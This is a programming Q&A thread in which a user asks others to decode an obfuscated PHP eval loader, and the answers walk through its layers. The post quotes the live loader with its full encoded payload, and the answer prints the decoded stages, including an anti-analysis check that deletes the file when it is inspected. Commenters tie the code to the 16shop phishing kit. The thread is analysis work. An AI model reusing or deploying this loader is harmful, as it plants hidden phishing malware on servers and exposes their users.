# Can anyone decode this? (eval(hex2bin(str_rot13(gzinflate(str_rot13(base64_decode

Tags: php, eval, decode

Hi i was wondering how to decode this code.
original code

```
<?php error_reporting(0);define('__LOCALFILE__', __FILE__);define('HELLO', fopen(__FILE__, 'r'));fseek(HELLO, __COMPILER_HALT_OFFSET__);$a="\x68";$b="\x65";$c="\x78";$d="\x32";$e="\x62";$f="\x69";$g="\x6e";$aNjE4NjIwNDEzd="\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65";$kMTUwNjIyNTU5s="$a$b$c$d$e$f$g";$det="\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";$gODY5MjczNzY2f="\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";$wMTQ4NjQyMzE0z="\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";eval("?>".$kMTUwNjIyNTU5s($det($wMTQ4NjQyMzE0z($gODY5MjczNzY2f($aNjE4NjIwNDEzd("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"))))));
```

so far i know the code is like this

```
https://pastebin.com/af5vi6YY
```

Comment: Looks like a decompressor for compressed code.  Could be malicious. Where’d you find it?

Comment: yes it could be, and that's why im decoding this. some random guy shares it with me

Comment: The PHP script got injected with malicious codes. I found a similar script at: https://www.unphp.net/decode/8b99d12b5ce59f77444be3465f0fac4f/ . By the way, your Pastebin cannot be viewed.

Comment: forth decode ....like this `error_reporting(0);
$file = file_get_contents(__LOCALFILE__);
if (preg_match('/echo/', $file) or preg_match('/print/', $file)) {
    unlink(__LOCALFILE__);
    exit('X_X');
}
    function replacedata($data)
    {
        $data = str_replace('#_^wkss|#', 'g', $data);
        $data = str_replace('#as|k#', 'n', $data);

        return $data;
    }`

Answer (score 1, accepted):

decode it ..

```php
error_reporting(0);
define('__LOCALFILE__', __FILE__);
define('HELLO', fopen(__FILE__, 'r'));
fseek(HELLO, __COMPILER_HALT_OFFSET__);
$a = "\x68"; // h
$b = "\x65"; // e
$c = "\x78"; // x
$d = "\x32"; // 2
$e = "\x62"; // b
$f = "\x69"; // i
$g = "\x6e"; // n
$aNjE4NjIwNDEzd = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$kMTUwNjIyNTU5s = "$a$b$c$d$e$f$g"; // hex2bin
$det = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";  // str_rot13
$gODY5MjczNzY2f = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$wMTQ4NjQyMzE0z = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; // gzinflate
$aNjE4NjIwNDEzd = 'base64_decode';
$kMTUwNjIyNTU5s = 'hex2bin';
$det = $gODY5MjczNzY2f = 'str_rot13';
$wMTQ4NjQyMzE0z = 'gzinflate';
// first
echo $kMTUwNjIyNTU5s($det($wMTQ4NjQyMzE0z($gODY5MjczNzY2f($aNjE4NjIwNDEzd('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')))));
$devil = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65";
$det = "9pQfJowOh_^\]..XYk_^\]..C%%lo^>uJX__%..[0Vmc#kufetaw#AC%%lo^>#kufetaw#k#kufetaw#C7kSY0FGZkwi%%lo^>uJCLiMya8NXYj%%lo^>CKlNWYsBXZy9lc0NH%%lo^>9ASY0FGZkAC%%lo^>#kufetaw#ASCKsTKh_^\]..XYk_^\]..CLicm%%lo^>s%%lo^>y%%lo^>8N3cr__%..[#ysae#XfNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D%%lo^>h_^\]..XYk_^\]..SCJowe#kufetaw#kSY0FGZk#kufetaw#SY0FGZlNWYsBXZyBibvlG__%..[j5W__%..[ml#kufetaw#C7V2csVWfKsTKi#kufetaw#1XYJCKllGZJowOp81XFxUSGxUQD9ETf9FKr5Was5W__%..[JowepkSZslmZkwyJvQ#ysae#bpJHcvcCKoNG__%..[h12X#ysae#VmcwBicvBSKlxWam_^\]..CL#ysae#8yboNWZvcCKoNG__%..[h12X#ysae#VmcwhiZppwOp81XFxUSGxUQD9ETf9FK%_____^\]..#ysae#bl_^\]..#ysae#bvN2X0V2ZfVGbpZG%%lo^>9ASZslmZkowOpADK#ysae#5Wa0J3bwVmcfJ3byJXZKAHaw9DP";
$scream = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$cet = "+8%____OpkC__%..[l_^\]..GJowWa2VGZk4i%%lo^>+8j%%lo^>owWY2VGQ7kC__%..[l_^\]..GJs%%lo^>CZiwyJf9VJu4yW#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>SSiwi%%lo^>lUCbv5lPi#kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>iUiwyJf5FX__%..[5iL#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>ieiwi%%lo^>l81Xf9l%%lo^>oU2YhxGclJ3Xy_^\]..3c9QXZk_^\]..yOpQXZk_^\]..CLi4m%%lo^>s%%lo^>y%%lo^>5NXYlNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>yZiwi%%lo^>jsW__%..[mVG__%..[h__%..[3%%lo^>i#kufetaw#SZjFGbwVmcfJH__%..[%____BSP0VGZksTK0VGZk#kufetaw#i__%..[lJ#ysae#c0NXP0VGZkAyLqAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AiC#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#%%lo^>CU4#kufetaw#DO4#kufetaw#TWiAC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>iAFO4#kufetaw#DOZJC%%lo^>#kufetaw#Ai%%lo^>QhDO4#kufetaw#TWiACO4#kufetaw#DO4#kufetaw#DOKAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AFO4QmL#kufetaw#4iY4#kufetaw#TW#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>QhDOkBC%%lo^>ihDOZBCU4#kufetaw#DZ#kufetaw#AiY4#kufetaw#TW#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4%%lo^>C%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#Ai%%lo^>QhDO4#kufetaw#DO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiLihDOZJC%%lo^>#kufetaw#AC%%lo^>#kufetaw#%%lo^>GO4kl%%lo^>#kufetaw#AFO4#kufetaw#D%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>KACU4#kufetaw#DZ#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4#kufetaw#DO4#kufetaw#DO4#kufetaw#D%%lo^>#kufetaw#AiLihDO4kl%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DZ4#kufetaw#DO#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4kF%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>ihDOZJC%%lo^>iAFO4QG%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiY4#kufetaw#TW#kufetaw#ACU4#kufetaw#DZ#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#AFO4QG%%lo^>#kufetaw##kufetaw#DO4#kufetaw#DZKAC%%lo^>u%%lo^>GO4#kufetaw#DO4#kufetaw#DO#kufetaw#AiLihDO4#kufetaw#DOk5C%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#4iY4#kufetaw#DO4QmL#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DOk5C%%lo^>#kufetaw#ACO4#kufetaw#DZ#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#oyL#kufetaw#AHaw9DP";
$a = "\x68";
$b = "\x65";
$c = "\x78";
$d = "\x32";
$e = "\x62";
$f = "\x69";
$g = "\x6e";
$h = "\x3F\x3E"; // >
$aOTE0MzE5NjM0d = "\x62\x61\163\145\x36\64\137\144\x65\143\x6f\x64\x65"; // base64_decode
$kNjM3ODM3ODA4s = 'hex2bin';
$lMjEwMzY5OTkwc = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$gMTkzNDAzMDE5f = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; // str_rot13
$wOTAxMTUxNjYxz = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65"; // gzinflate
$aOTE0MzE5NjM0d = 'base64_decode';
$kNjM3ODM3ODA4s = 'hex2bin';
$lMjEwMzY5OTkwc = $gMTkzNDAzMDE5f = 'str_rot13';
$wOTAxMTUxNjYxz = 'gzinflate';
//second
// echo $kNjM3ODM3ODA4s($lMjEwMzY5OTkwc($wOTAxMTUxNjYxz($gMTkzNDAzMDE5f($aOTE0MzE5NjM0d('xUdbksQgCLySAYHkRWzo/asWWYya0p2d/HnxMVDbNtBLwR2jOJ7FgYMIK7gcQf+zx9niwk/OZHOAMFObW2hJZJ/sJ+rWwrX8zCgp0mUxB3W//s1IBkCfXUO3tr23mjlhfqjRfv2nTx/PTL9+9qSqa1pFcK2j39QvfvbrRkjRXLoDdyfezJ/j2s8H/7vbgN8d/Zv/9fuvz+qZi1h9tF+/bCtuxC71n/srmy4u9dGhShVqxGHn/6dL9VvkwDMyicdQQ7yAgHMMZsZuwa1jwJ0sionna+fJzpSvD1CEJ/FZzE+8ASq2A7Ck3xdtqjTp+WUrhbHSS4fiGUCniqwvR1HfRqCDaQqqJKZwZd9qg4ECVN71+tWPX970UJtoBJQmWP2wf+prdLvUO3uqHNH8C+AFGVpEQo5t02nHSz8=')))));
$cet = "+8%____OpkC__%..[l_^\]..GJowWa2VGZk4i%%lo^>+8j%%lo^>owWY2VGQ7kC__%..[l_^\]..GJs%%lo^>CZiwyJf9VJu4yW#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>SSiwi%%lo^>lUCbv5lPi#kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>iUiwyJf5FX__%..[5iL#ysae##kufetaw#SZjFGbwVmcfJH__%..[%____1D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>ieiwi%%lo^>l81Xf9l%%lo^>oU2YhxGclJ3Xy_^\]..3c9QXZk_^\]..yOpQXZk_^\]..CLi4m%%lo^>s%%lo^>y%%lo^>5NXYlNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D__%..[l_^\]..GJ7kC__%..[l_^\]..GJs%%lo^>yZiwi%%lo^>jsW__%..[mVG__%..[h__%..[3%%lo^>i#kufetaw#SZjFGbwVmcfJH__%..[%____BSP0VGZksTK0VGZk#kufetaw#i__%..[lJ#ysae#c0NXP0VGZkAyLqAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AiC#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#%%lo^>CU4#kufetaw#DO4#kufetaw#TWiAC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>iAFO4#kufetaw#DOZJC%%lo^>#kufetaw#Ai%%lo^>QhDO4#kufetaw#TWiACO4#kufetaw#DO4#kufetaw#DOKAC%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AFO4QmL#kufetaw#4iY4#kufetaw#TW#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>QhDOkBC%%lo^>ihDOZBCU4#kufetaw#DZ#kufetaw#AiY4#kufetaw#TW#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4%%lo^>C%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#Ai%%lo^>QhDO4#kufetaw#DO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiLihDOZJC%%lo^>#kufetaw#AC%%lo^>#kufetaw#%%lo^>GO4kl%%lo^>#kufetaw#AFO4#kufetaw#D%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>KACU4#kufetaw#DZ#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw##kufetaw#DO4#kufetaw#DO4#kufetaw#DO4#kufetaw#D%%lo^>#kufetaw#AiLihDO4kl%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DZ4#kufetaw#DO#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#oA%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4ACO4#kufetaw#D%%lo^>#kufetaw#AC%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>u%%lo^>GO4kF%%lo^>#kufetaw#AC%%lo^>#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>4#kufetaw#DO#kufetaw#AiC#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>ihDOZJC%%lo^>iAFO4QG%%lo^>4#kufetaw#DO#kufetaw#AC%%lo^>#kufetaw##kufetaw#DO4AiY4#kufetaw#TW#kufetaw#ACU4#kufetaw#DZ#kufetaw#%%lo^>GO4kF%%lo^>#kufetaw#AFO4QG%%lo^>#kufetaw##kufetaw#DO4#kufetaw#DZKAC%%lo^>u%%lo^>GO4#kufetaw#DO4#kufetaw#DO#kufetaw#AiLihDO4#kufetaw#DOk5C%%lo^>#kufetaw##kufetaw#DO4AC%%lo^>#kufetaw#ACO4#kufetaw#D%%lo^>#kufetaw#4iY4#kufetaw#DO4QmL#kufetaw#AC%%lo^>u%%lo^>GO4#kufetaw#DOk5C%%lo^>#kufetaw#ACO4#kufetaw#DZ#kufetaw#oA%%lo^>#kufetaw#AC%%lo^>#kufetaw#oyL#kufetaw#AHaw9DP";
$cet = strrev($cet);
$cet = str_replace('#watefuk#', 'g', $cet);
$cet = str_replace('#easy#', 'n', $cet);
$cet = str_replace('____%', 'z', $cet);
$cet = str_replace('..]\^_', 'R', $cet);
$cet = str_replace('>^ol%%', 'I', $cet);
$cet = str_replace('[..%__', 'd', $cet);
echo base64_decode($cet);
//third
$det = "9pQfJowOh_^\]..XYk_^\]..C%%lo^>uJX__%..[0Vmc#kufetaw#AC%%lo^>#kufetaw#k#kufetaw#C7kSY0FGZkwi%%lo^>uJCLiMya8NXYj%%lo^>CKlNWYsBXZy9lc0NH%%lo^>9ASY0FGZkAC%%lo^>#kufetaw#ASCKsTKh_^\]..XYk_^\]..CLicm%%lo^>s%%lo^>y%%lo^>8N3cr__%..[#ysae#XfNi%%lo^>oU2YhxGclJ3Xy_^\]..3c#kufetaw#0D%%lo^>h_^\]..XYk_^\]..SCJowe#kufetaw#kSY0FGZk#kufetaw#SY0FGZlNWYsBXZyBibvlG__%..[j5W__%..[ml#kufetaw#C7V2csVWfKsTKi#kufetaw#1XYJCKllGZJowOp81XFxUSGxUQD9ETf9FKr5Was5W__%..[JowepkSZslmZkwyJvQ#ysae#bpJHcvcCKoNG__%..[h12X#ysae#VmcwBicvBSKlxWam_^\]..CL#ysae#8yboNWZvcCKoNG__%..[h12X#ysae#VmcwhiZppwOp81XFxUSGxUQD9ETf9FK%_____^\]..#ysae#bl_^\]..#ysae#bvN2X0V2ZfVGbpZG%%lo^>9ASZslmZkowOpADK#ysae#5Wa0J3bwVmcfJ3byJXZKAHaw9DP";
$det = strrev($det);
$det = str_replace('#watefuk#', 'g', $det);
$det = str_replace('#easy#', 'n', $det);
$det = str_replace('____%', 'z', $det);
$det = str_replace('..]\^_', 'R', $det);
$det = str_replace('>^ol%%', 'I', $det);
$det = str_replace('[..%__', 'd', $det);
echo base64_decode($det);

//forth
error_reporting(0);
$file = file_get_contents(__LOCALFILE__);
if (preg_match('/echo/', $file) or preg_match('/print/', $file)) {
    unlink(__LOCALFILE__);
    exit('X_X');
}
function replacedata($data)
{
    $data = str_replace('#_^wkss|#', 'g', $data);
    $data = str_replace('#as|k#', 'n', $data);

    return $data;
}
```

Comment: convert eval to echo ...

Comment: Yes, I'm getting the same result. But what does this script trying to achieve?

Comment: im completly new to php. is it malicious ?

Comment: Yes. The codes are injected to your PHP and try to alter the files you got.

Comment: what these codes do

Comment: look at the code comment `16shop` ,you can google what's mean "16shop" ....